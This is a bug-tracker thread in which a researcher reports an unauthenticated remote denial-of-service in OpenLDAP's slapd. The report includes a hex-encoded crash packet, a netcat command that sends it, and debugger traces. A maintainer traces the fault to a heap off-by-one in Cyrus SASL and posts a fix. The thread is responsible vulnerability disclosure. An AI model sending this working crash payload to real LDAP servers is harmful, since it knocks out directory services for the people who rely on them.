Full_Name: Stephan Zeisberg Version: 2.4.48 OS: Fedora 31 (kernel 5.3.11-300.fc31.x86_64) URL: Submission from: (NULL) (78.54.65.139) Dear openldap team � # Issue description Unauthenticated remote denial-of-service through malformed ldap packet # Version openldap-2.4.48.tgz # How to reproduce ## Compile $ tar xzvf openldap-2.4.48.tgz $ cd openldap-2.4.48 $ ./configure --prefix=/tmp/openldap $ make depend $ make $ make install $ cd /tmp/openldap ## Start server $ ./libexec/slapd -d 1 -h ldap://127.0.0.1:9091 ## Create PoC crash file $ echo -n "30840000054b020200d76084000005410201030400a38400000500a38203e2618203de308203daa003020105a1151b1357324b332e564d4e4554312e564d2e42415345a2443042a003020102a13b30391b046c6461701b1c7739dd332d3130312e77326b332e766d6e6574312e766d2e626173651b1377326b332e766d6e65a003020117a103020108a28203620482035ea235aaeb4b8dad2cc1a67f54db030352cc34864c8cf3b643a2d7d3111e0aebe0eef97130b4506cbf28b01c6c2bb49aeded09b8644ec146d29409d71838187b135aa779ca3e35c7b3d02cc60c53d65199e04b12cdc980d05cd1b0abd83791ecee27d79567bfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfd0fbd3bfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbf00000000000000febfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbf
bfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbf3b5e5d1743d6817779d9d3eef990ede178f7373a04f3821809f800ac200ca3bc67b32e9b2a2a3745cf67c91941a1ec2fdf50aa7a3c2dbc821831e8fcc4d15184978a6801801a76f588bfc196e924338201fe3b5e5d1743d6817779d9d3eef990ed151b1357324b332e564d4e4554312e564d2e42415345a2443042a003020102a13b30391b046c6461701b1c7739dd332d3130312e77326b332e762d37343237323839373736333432303739363739766d6e6574312e766d2e62617365a382037430820370a003020117a103020108a28203620482035ea235aaeb4b8dad2cc1a67f54db030352cc34864c8c2d36313031373033343136323732353138393733b01c6c2bb49aeded09b8644ec146d29409d71838187b135aa779ca3e35c7b3d02cc60c53d65199e04b12cdc980d05cd1b0abd83791ecee27d795679594064442bcb1ecb8639a7ef1825665683557bad4839e1a7b3cc5b76fc0ac093dcc62dd34116e7f202e38118c94c6ee468ae137aa6fce3070c081dd3941889887aac17b7b9fae6b1b432f97a905fe0765df558d738b2debc47b19b59b1c9b455cc29b88eb64620b8928714e76b310d36df7c1bfbda3fb4fbdc1fd4f34c901801a76f588bfc196e924338201fe3b5e5d1743d6817779d9d3eef990ede178f7373a04f3821809f800ac200ca3bc67b32e9b2a2a3745cf67c91941a1ec2fdf50aa7a3c2dbc821931e8fcc4d15184978a6801801a76f588bfc196e924338201fe3b5e5d1743d6817779d9d3eef990ede1" | xxd -r -p > ldap.crash ## Execute PoC (may need to be executed multiple times) $ nc 127.0.0.1 9091 < ldap.crash # GDB ... slapd: malloc.c:2379: sysmalloc: Assertion `(old_top == initial_top (av) && old_size == 0) || ((unsigned long) (old_size) >= MINSIZE && prev_inuse (old_top) && ((unsigned long) old_end & (pagesize - 1)) == 0)' failed. Thread 3 "slapd" received signal SIGABRT, Aborted. 
[Switching to Thread 0x7fffb4aba700 (LWP 3684510)] 0x00007ffff5b3a625 in raise () from /lib64/libc.so.6 Missing separate debuginfos, use: dnf debuginfo-install cyrus-sasl-gssapi-2.1.27-2.fc31.x86_64 cyrus-sasl-lib-2.1.27-2.fc31.x86_64 cyrus-sasl-plain-2.1.27-2.fc31.x86_64 keyutils-libs-1.6-3.fc31.x86_64 krb5-libs-1.17-45.fc31.x86_64 l ibcom_err-1.45.3-1.fc31.x86_64 libdb-5.3.28-38.fc31.x86_64 libgcc-9.2.1-1.fc31.x86_64 libicu-63.2-3.fc31.x86_64 libselinux-2.9-5.fc31.x86_64 libstdc++-9.2.1-1.fc31.x86_64 libuuid-2.34-3.fc31.x86_64 nss-mdns-0.14.1-4.fc31.x86_64 open ssl-libs-1.1.1d-2.fc31.x86_64 zlib-1.2.11-20.fc31.x86_64 (gdb) bt #0 0x00007ffff5b3a625 in raise () from /lib64/libc.so.6 #1 0x00007ffff5b238d9 in abort () from /lib64/libc.so.6 #2 0x00007ffff5b85a7a in __malloc_assert () from /lib64/libc.so.6 #3 0x00007ffff5b882bf in sysmalloc () from /lib64/libc.so.6 #4 0x00007ffff5b89072 in _int_malloc () from /lib64/libc.so.6 #5 0x00007ffff5b8af55 in calloc () from /lib64/libc.so.6 #6 0x00007ffff5b7ced8 in open_memstream () from /lib64/libc.so.6 #7 0x00007ffff5bf99d5 in __vsyslog_internal () from /lib64/libc.so.6 #8 0x00007ffff5bf9f4a in syslog () from /lib64/libc.so.6 #9 0x00000000004ef3b4 in slap_sasl_log (context=0x7ffff54bf110, priority=<optimized out>, message=0x7fffa8103d30 "Couldn't find mech a\202\003\336\060\202\003ڠ\003\002\001\005\241\025\033\023W2K3.VMNET1.VM.BASE\242D0B\240\003\002\001\002\241;09\033\004ldap\033\034w9\335\063-101.w2k3.vmnet1.vm.base\033\023w2k3.vmne\240\003\002\001\027\241\003\002\001\b\242\202\003b\004\202\003^\242\065\252\353K\215\255,\301\246\177T\333\003\003R\314\064\206L\214\363\266C\242\327\323\021\036\n\353\340\356\371q0\264Pl\277(\260\034l+\264\232\355\355\t\270dN\301FҔ\t\327\030\070\030{\023Z\247y"...) 
at sasl.c:146 #10 0x00007ffff6203344 in sasl_seterror () from /lib64/libsasl2.so.3 #11 0x00007ffff6202324 in sasl_server_start () from /lib64/libsasl2.so.3 #12 0x00000000004f1098 in slap_sasl_bind (op=<optimized out>, rs=0x7fffb4ab88b0) at sasl.c:1524 #13 0x000000000049fd28 in fe_op_bind (op=0x7fffa8003120, rs=0x7fffb4ab88b0) at bind.c:280 #14 0x000000000049f350 in do_bind (op=0x7fffa8003120, rs=0x7fffb4ab88b0) at bind.c:205 #15 0x0000000000472ca8 in connection_operation (ctx=0x7fffb4ab89e8, arg_v=0x7fffa8003120) at connection.c:1158 #16 0x0000000000471332 in connection_read_thread (ctx=0x7fffb4ab89e8, argv=<optimized out>) at connection.c:1294 #17 0x00000000005fee7a in ldap_int_thread_pool_wrapper (xpool=0xa0b9f10) at tpool.c:696 #18 0x00007ffff5e444e2 in start_thread () from /lib64/libpthread.so.0 #19 0x00007ffff5bff693 in clone () from /lib64/libc.so.6 Please let me know what additional information I can provide to successfully reproduce the issue. Note: I have also tested and reproduced the issue using the precompiled package from the Fedora repositories: openldap-servers-2.4.47-3.fc31.x86_64 (OpenLDAP: slapd 2.4.47 (Jul 25 2019 00:00:00)) -Stephan Zeisberg
stephan@srlabs.de wrote: > Full_Name: Stephan Zeisberg > Version: 2.4.48 > OS: Fedora 31 (kernel 5.3.11-300.fc31.x86_64) > URL: > Submission from: (NULL) (78.54.65.139) > > > Dear openldap team — > > # Issue description > > Unauthenticated remote denial-of-service through malformed ldap packet > > # Version > > openldap-2.4.48.tgz > > # How to reproduce > > ## Compile > > $ tar xzvf openldap-2.4.48.tgz > $ cd openldap-2.4.48 > $ ./configure --prefix=/tmp/openldap > $ make depend > $ make > $ make install > $ cd /tmp/openldap > > ## Start server > > $ ./libexec/slapd -d 1 -h ldap://127.0.0.1:9091 > > ## Create PoC crash file > > $ echo -n "30840000054b020200d76084000005410201030400a38400000500a38203e2618203de308203daa003020105a1151b1357324b332e564d4e4554312e564d2e42415345a2443042a003020102a13b30391b046c6461701b1c7739dd332d3130312e77326b332e766d6e6574312e766d2e626173651b1377326b332e766d6e65a003020117a103020108a28203620482035ea235aaeb4b8dad2cc1a67f54db030352cc34864c8cf3b643a2d7d3111e0aebe0eef97130b4506cbf28b01c6c2bb49aeded09b8644ec146d29409d71838187b135aa779ca3e35c7b3d02cc60c53d65199e04b12cdc980d05cd1b0abd83791ecee27d79567bfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfd0fbd3bfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfb > 
fbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbf00000000000000febfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbf3b5e5d1743d6817779d9d3eef990ede178f7373a04f3821809f800ac200ca3bc67b32e9b2a2a3745cf67c91941a1ec2fdf50aa7a3c2dbc821831e8fcc4d15184978a6801801a76f588bfc196e924338201fe3b5e5d1743d6817779d9d3eef990ed151b1357324b332e564d4e4554312e564d2e42415345a2443042a003020102a13b30391b046c6461701b1c7739dd332d3130312e77326b332e762d373432373238393737 > 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" > | xxd -r -p > ldap.crash > > ## Execute PoC (may need to be executed multiple times) > > $ nc 127.0.0.1 9091 < ldap.crash > > > > # GDB > > ... > slapd: malloc.c:2379: sysmalloc: Assertion `(old_top == initial_top (av) && > old_size == 0) || ((unsigned long) (old_size) >= MINSIZE && prev_inuse (old_top) > && ((unsigned long) old_end & (pagesize - 1)) == 0)' failed. > > Thread 3 "slapd" received signal SIGABRT, Aborted. 
> [Switching to Thread 0x7fffb4aba700 (LWP 3684510)] > 0x00007ffff5b3a625 in raise () from /lib64/libc.so.6 > Missing separate debuginfos, use: dnf debuginfo-install > cyrus-sasl-gssapi-2.1.27-2.fc31.x86_64 cyrus-sasl-lib-2.1.27-2.fc31.x86_64 > cyrus-sasl-plain-2.1.27-2.fc31.x86_64 keyutils-libs-1.6-3.fc31.x86_64 > krb5-libs-1.17-45.fc31.x86_64 l > ibcom_err-1.45.3-1.fc31.x86_64 libdb-5.3.28-38.fc31.x86_64 > libgcc-9.2.1-1.fc31.x86_64 libicu-63.2-3.fc31.x86_64 > libselinux-2.9-5.fc31.x86_64 libstdc++-9.2.1-1.fc31.x86_64 > libuuid-2.34-3.fc31.x86_64 nss-mdns-0.14.1-4.fc31.x86_64 open > ssl-libs-1.1.1d-2.fc31.x86_64 zlib-1.2.11-20.fc31.x86_64 > (gdb) bt > #0 0x00007ffff5b3a625 in raise () from /lib64/libc.so.6 > #1 0x00007ffff5b238d9 in abort () from /lib64/libc.so.6 > #2 0x00007ffff5b85a7a in __malloc_assert () from /lib64/libc.so.6 > #3 0x00007ffff5b882bf in sysmalloc () from /lib64/libc.so.6 > #4 0x00007ffff5b89072 in _int_malloc () from /lib64/libc.so.6 > #5 0x00007ffff5b8af55 in calloc () from /lib64/libc.so.6 > #6 0x00007ffff5b7ced8 in open_memstream () from /lib64/libc.so.6 > #7 0x00007ffff5bf99d5 in __vsyslog_internal () from /lib64/libc.so.6 > #8 0x00007ffff5bf9f4a in syslog () from /lib64/libc.so.6 > #9 0x00000000004ef3b4 in slap_sasl_log (context=0x7ffff54bf110, > priority=<optimized out>, > message=0x7fffa8103d30 "Couldn't find mech > a\202\003\336\060\202\003ڠ\003\002\001\005\241\025\033\023W2K3.VMNET1.VM.BASE\242D0B\240\003\002\001\002\241;09\033\004ldap\033\034w9\335\063-101.w2k3.vmnet1.vm.base\033\023w2k3.vmne\240\003\002\001\027\241\003\002\001\b\242\202\003b\004\202\003^\242\065\252\353K\215\255,\301\246\177T\333\003\003R\314\064\206L\214\363\266C\242\327\323\021\036\n\353\340\356\371q0\264Pl\277(\260\034l+\264\232\355\355\t\270dN\301FҔ\t\327\030\070\030{\023Z\247y"...) 
> at sasl.c:146 > #10 0x00007ffff6203344 in sasl_seterror () from /lib64/libsasl2.so.3 > #11 0x00007ffff6202324 in sasl_server_start () from /lib64/libsasl2.so.3 > #12 0x00000000004f1098 in slap_sasl_bind (op=<optimized out>, rs=0x7fffb4ab88b0) > at sasl.c:1524 > #13 0x000000000049fd28 in fe_op_bind (op=0x7fffa8003120, rs=0x7fffb4ab88b0) at > bind.c:280 > #14 0x000000000049f350 in do_bind (op=0x7fffa8003120, rs=0x7fffb4ab88b0) at > bind.c:205 > #15 0x0000000000472ca8 in connection_operation (ctx=0x7fffb4ab89e8, > arg_v=0x7fffa8003120) at connection.c:1158 > #16 0x0000000000471332 in connection_read_thread (ctx=0x7fffb4ab89e8, > argv=<optimized out>) at connection.c:1294 > #17 0x00000000005fee7a in ldap_int_thread_pool_wrapper (xpool=0xa0b9f10) at > tpool.c:696 > #18 0x00007ffff5e444e2 in start_thread () from /lib64/libpthread.so.0 > #19 0x00007ffff5bff693 in clone () from /lib64/libc.so.6 > > Please let me know what additional information I can provide to successfully > reproduce the issue. > > Note: I have also tested and reproduced the issue using the precompiled package > from the Fedora repositories: openldap-servers-2.4.47-3.fc31.x86_64 (OpenLDAP: > slapd 2.4.47 (Jul 25 2019 00:00:00)) Thanks, but your trace clearly shows that this is a fault in Cyrus SASL, you should be reporting this issue to them. 
valgrind confirms it as well: 5ddfddde do_bind: dn () SASL mech a��0�ڠ�2K3.VMNET1.VM.BASE�D0B��;09dap9�3-101.w2k3.vmnet1.vm.base2k3.vmne���b�^�5��K��,��T�R�4�L��C��� ����q0�Pl�(�l+���� �dN�FҔ �8{Z�y�>5dz�,� S�Q��K�ɀ�\Ѱ��7���'וg���������������������������������������������������������������������������������������������������������ӿ�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������� 5ddfddde ==> sasl_bind: dn="" mech=a��0�ڠ�2K3.VMNET1.VM.BASE�D0B��;09dap9�3-101.w2k3.vmnet1.vm.base2k3.vmne���b�^�5��K��,��T�R�4�L��C��� ����q0�Pl�(�l+���� �dN�FҔ �8{Z�y�>5dz�,� S�Q��K�ɀ�\Ѱ��7���'וg���������������������������������������������������������������������������������������������������������ӿ�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������� datalen=0 ==11019== Thread 3: ==11019== Invalid write of size 1 ==11019== at 0x4B9B1DB: sasl_seterror (seterror.c:247) ==11019== by 0x4B9A18D: sasl_server_start (server.c:1418) ==11019== by 0x26B88B: slap_sasl_bind (sasl.c:1666) ==11019== by 0x21E130: fe_op_bind (bind.c:279) ==11019== by 0x21DCE1: do_bind (bind.c:205) ==11019== by 0x1F35BA: connection_operation (connection.c:1185) ==11019== by 0x1F3CE7: connection_read_thread (connection.c:1342) ==11019== by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.c:1048) ==11019== by 0x4DBE668: start_thread (pthread_create.c:479) ==11019== by 0x4EFA322: clone (clone.S:95) ==11019== Address 0x62032a8 is 0 bytes after a block of size 600 alloc'd ==11019== at 0x483CFAF: realloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) ==11019== by 0x4B930A4: _buf_alloc 
(common.c:2186) ==11019== by 0x4B93299: _sasl_add_string (common.c:196) ==11019== by 0x4B9B2D4: sasl_seterror (seterror.c:187) ==11019== by 0x4B9A18D: sasl_server_start (server.c:1418) ==11019== by 0x26B88B: slap_sasl_bind (sasl.c:1666) ==11019== by 0x21E130: fe_op_bind (bind.c:279) ==11019== by 0x21DCE1: do_bind (bind.c:205) ==11019== by 0x1F35BA: connection_operation (connection.c:1185) ==11019== by 0x1F3CE7: connection_read_thread (connection.c:1342) ==11019== by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.c:1048) ==11019== by 0x4DBE668: start_thread (pthread_create.c:479) ==11019== ==11019== Invalid read of size 1 ==11019== at 0x483DF54: strlen (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) ==11019== by 0x4E53DE4: __vfprintf_internal (vfprintf-internal.c:1688) ==11019== by 0x4E67029: __vsnprintf_internal (vsnprintf.c:114) ==11019== by 0x3A1FFA: lutil_debug (debug.c:74) ==11019== by 0x266FF3: slap_sasl_log (sasl.c:146) ==11019== by 0x4B9B4CF: sasl_seterror (seterror.c:260) ==11019== by 0x4B9A18D: sasl_server_start (server.c:1418) ==11019== by 0x26B88B: slap_sasl_bind (sasl.c:1666) ==11019== by 0x21E130: fe_op_bind (bind.c:279) ==11019== by 0x21DCE1: do_bind (bind.c:205) ==11019== by 0x1F35BA: connection_operation (connection.c:1185) ==11019== by 0x1F3CE7: connection_read_thread (connection.c:1342) ==11019== Address 0x62032a8 is 0 bytes after a block of size 600 alloc'd ==11019== at 0x483CFAF: realloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) ==11019== by 0x4B930A4: _buf_alloc (common.c:2186) ==11019== by 0x4B93299: _sasl_add_string (common.c:196) ==11019== by 0x4B9B2D4: sasl_seterror (seterror.c:187) ==11019== by 0x4B9A18D: sasl_server_start (server.c:1418) ==11019== by 0x26B88B: slap_sasl_bind (sasl.c:1666) ==11019== by 0x21E130: fe_op_bind (bind.c:279) ==11019== by 0x21DCE1: do_bind (bind.c:205) ==11019== by 0x1F35BA: connection_operation (connection.c:1185) ==11019== by 0x1F3CE7: 
connection_read_thread (connection.c:1342) ==11019== by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.c:1048) ==11019== by 0x4DBE668: start_thread (pthread_create.c:479) -- -- Howard Chu CTO, Symas Corp. http://www.symas.com Director, Highland Sun http://highlandsun.com/hyc/ Chief Architect, OpenLDAP http://www.openldap.org/project/
Resending with the non-printable chars omitted: Howard Chu wrote: > Thanks, but your trace clearly shows that this is a fault in Cyrus SASL, you should be reporting > this issue to them. > > valgrind confirms it as well: > > 5ddfddde do_bind: dn () SASL mech <garbage> > 5ddfddde ==> sasl_bind: dn="" mech=<garbage> > datalen=0 > ==11019== Thread 3: > ==11019== Invalid write of size 1 > ==11019== at 0x4B9B1DB: sasl_seterror (seterror.c:247) > ==11019== by 0x4B9A18D: sasl_server_start (server.c:1418) > ==11019== by 0x26B88B: slap_sasl_bind (sasl.c:1666) > ==11019== by 0x21E130: fe_op_bind (bind.c:279) > ==11019== by 0x21DCE1: do_bind (bind.c:205) > ==11019== by 0x1F35BA: connection_operation (connection.c:1185) > ==11019== by 0x1F3CE7: connection_read_thread (connection.c:1342) > ==11019== by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.c:1048) > ==11019== by 0x4DBE668: start_thread (pthread_create.c:479) > ==11019== by 0x4EFA322: clone (clone.S:95) > ==11019== Address 0x62032a8 is 0 bytes after a block of size 600 alloc'd > ==11019== at 0x483CFAF: realloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) > ==11019== by 0x4B930A4: _buf_alloc (common.c:2186) > ==11019== by 0x4B93299: _sasl_add_string (common.c:196) > ==11019== by 0x4B9B2D4: sasl_seterror (seterror.c:187) > ==11019== by 0x4B9A18D: sasl_server_start (server.c:1418) > ==11019== by 0x26B88B: slap_sasl_bind (sasl.c:1666) > ==11019== by 0x21E130: fe_op_bind (bind.c:279) > ==11019== by 0x21DCE1: do_bind (bind.c:205) > ==11019== by 0x1F35BA: connection_operation (connection.c:1185) > ==11019== by 0x1F3CE7: connection_read_thread (connection.c:1342) > ==11019== by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.c:1048) > ==11019== by 0x4DBE668: start_thread (pthread_create.c:479) > ==11019== > ==11019== Invalid read of size 1 > ==11019== at 0x483DF54: strlen (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) > ==11019== by 0x4E53DE4: __vfprintf_internal 
(vfprintf-internal.c:1688) > ==11019== by 0x4E67029: __vsnprintf_internal (vsnprintf.c:114) > ==11019== by 0x3A1FFA: lutil_debug (debug.c:74) > ==11019== by 0x266FF3: slap_sasl_log (sasl.c:146) > ==11019== by 0x4B9B4CF: sasl_seterror (seterror.c:260) > ==11019== by 0x4B9A18D: sasl_server_start (server.c:1418) > ==11019== by 0x26B88B: slap_sasl_bind (sasl.c:1666) > ==11019== by 0x21E130: fe_op_bind (bind.c:279) > ==11019== by 0x21DCE1: do_bind (bind.c:205) > ==11019== by 0x1F35BA: connection_operation (connection.c:1185) > ==11019== by 0x1F3CE7: connection_read_thread (connection.c:1342) > ==11019== Address 0x62032a8 is 0 bytes after a block of size 600 alloc'd > ==11019== at 0x483CFAF: realloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) > ==11019== by 0x4B930A4: _buf_alloc (common.c:2186) > ==11019== by 0x4B93299: _sasl_add_string (common.c:196) > ==11019== by 0x4B9B2D4: sasl_seterror (seterror.c:187) > ==11019== by 0x4B9A18D: sasl_server_start (server.c:1418) > ==11019== by 0x26B88B: slap_sasl_bind (sasl.c:1666) > ==11019== by 0x21E130: fe_op_bind (bind.c:279) > ==11019== by 0x21DCE1: do_bind (bind.c:205) > ==11019== by 0x1F35BA: connection_operation (connection.c:1185) > ==11019== by 0x1F3CE7: connection_read_thread (connection.c:1342) > ==11019== by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.c:1048) > ==11019== by 0x4DBE668: start_thread (pthread_create.c:479) > > > > -- -- Howard Chu CTO, Symas Corp. http://www.symas.com Director, Highland Sun http://highlandsun.com/hyc/ Chief Architect, OpenLDAP http://www.openldap.org/project/
Hi Howard — Thanks for the quick reply. Will forward the report upstream to Cyrus SASL. Best -Stephan On 11/28/19 3:54 PM, Howard Chu wrote: > Resending with the non-printable chars omitted: > > Howard Chu wrote: >> Thanks, but your trace clearly shows that this is a fault in Cyrus SASL, you should be reporting >> this issue to them. >> >> valgrind confirms it as well: >> >> 5ddfddde do_bind: dn () SASL mech <garbage> >> 5ddfddde ==> sasl_bind: dn="" mech=<garbage> >> datalen=0 >> ==11019== Thread 3: >> ==11019== Invalid write of size 1 >> ==11019== at 0x4B9B1DB: sasl_seterror (seterror.c:247) >> ==11019== by 0x4B9A18D: sasl_server_start (server.c:1418) >> ==11019== by 0x26B88B: slap_sasl_bind (sasl.c:1666) >> ==11019== by 0x21E130: fe_op_bind (bind.c:279) >> ==11019== by 0x21DCE1: do_bind (bind.c:205) >> ==11019== by 0x1F35BA: connection_operation (connection.c:1185) >> ==11019== by 0x1F3CE7: connection_read_thread (connection.c:1342) >> ==11019== by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.c:1048) >> ==11019== by 0x4DBE668: start_thread (pthread_create.c:479) >> ==11019== by 0x4EFA322: clone (clone.S:95) >> ==11019== Address 0x62032a8 is 0 bytes after a block of size 600 alloc'd >> ==11019== at 0x483CFAF: realloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) >> ==11019== by 0x4B930A4: _buf_alloc (common.c:2186) >> ==11019== by 0x4B93299: _sasl_add_string (common.c:196) >> ==11019== by 0x4B9B2D4: sasl_seterror (seterror.c:187) >> ==11019== by 0x4B9A18D: sasl_server_start (server.c:1418) >> ==11019== by 0x26B88B: slap_sasl_bind (sasl.c:1666) >> ==11019== by 0x21E130: fe_op_bind (bind.c:279) >> ==11019== by 0x21DCE1: do_bind (bind.c:205) >> ==11019== by 0x1F35BA: connection_operation (connection.c:1185) >> ==11019== by 0x1F3CE7: connection_read_thread (connection.c:1342) >> ==11019== by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.c:1048) >> ==11019== by 0x4DBE668: start_thread (pthread_create.c:479) >> ==11019== >> ==11019== 
Invalid read of size 1 >> ==11019== at 0x483DF54: strlen (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) >> ==11019== by 0x4E53DE4: __vfprintf_internal (vfprintf-internal.c:1688) >> ==11019== by 0x4E67029: __vsnprintf_internal (vsnprintf.c:114) >> ==11019== by 0x3A1FFA: lutil_debug (debug.c:74) >> ==11019== by 0x266FF3: slap_sasl_log (sasl.c:146) >> ==11019== by 0x4B9B4CF: sasl_seterror (seterror.c:260) >> ==11019== by 0x4B9A18D: sasl_server_start (server.c:1418) >> ==11019== by 0x26B88B: slap_sasl_bind (sasl.c:1666) >> ==11019== by 0x21E130: fe_op_bind (bind.c:279) >> ==11019== by 0x21DCE1: do_bind (bind.c:205) >> ==11019== by 0x1F35BA: connection_operation (connection.c:1185) >> ==11019== by 0x1F3CE7: connection_read_thread (connection.c:1342) >> ==11019== Address 0x62032a8 is 0 bytes after a block of size 600 alloc'd >> ==11019== at 0x483CFAF: realloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) >> ==11019== by 0x4B930A4: _buf_alloc (common.c:2186) >> ==11019== by 0x4B93299: _sasl_add_string (common.c:196) >> ==11019== by 0x4B9B2D4: sasl_seterror (seterror.c:187) >> ==11019== by 0x4B9A18D: sasl_server_start (server.c:1418) >> ==11019== by 0x26B88B: slap_sasl_bind (sasl.c:1666) >> ==11019== by 0x21E130: fe_op_bind (bind.c:279) >> ==11019== by 0x21DCE1: do_bind (bind.c:205) >> ==11019== by 0x1F35BA: connection_operation (connection.c:1185) >> ==11019== by 0x1F3CE7: connection_read_thread (connection.c:1342) >> ==11019== by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.c:1048) >> ==11019== by 0x4DBE668: start_thread (pthread_create.c:479) >> >> >> >> >
Stephan Zeisberg wrote: > Hi Howard — > > Thanks for the quick reply. Will forward the report upstream to Cyrus SASL. For reference, this fixes the bug: vielle:/home/software/cyrus-sasl> git diff
diff --git a/lib/common.c b/lib/common.c
index bc3bf1df..9969d6aa 100644
--- a/lib/common.c
+++ b/lib/common.c
@@ -190,7 +190,7 @@ int _sasl_add_string(char **out, size_t *alloclen,
 if (add==NULL) add = "(null)";
- addlen=strlen(add); /* only compute once */
+ addlen=strlen(add)+1; /* only compute once */
 if (_buf_alloc(out, alloclen, (*outlen)+addlen)!=SASL_OK) return SASL_NOMEM;
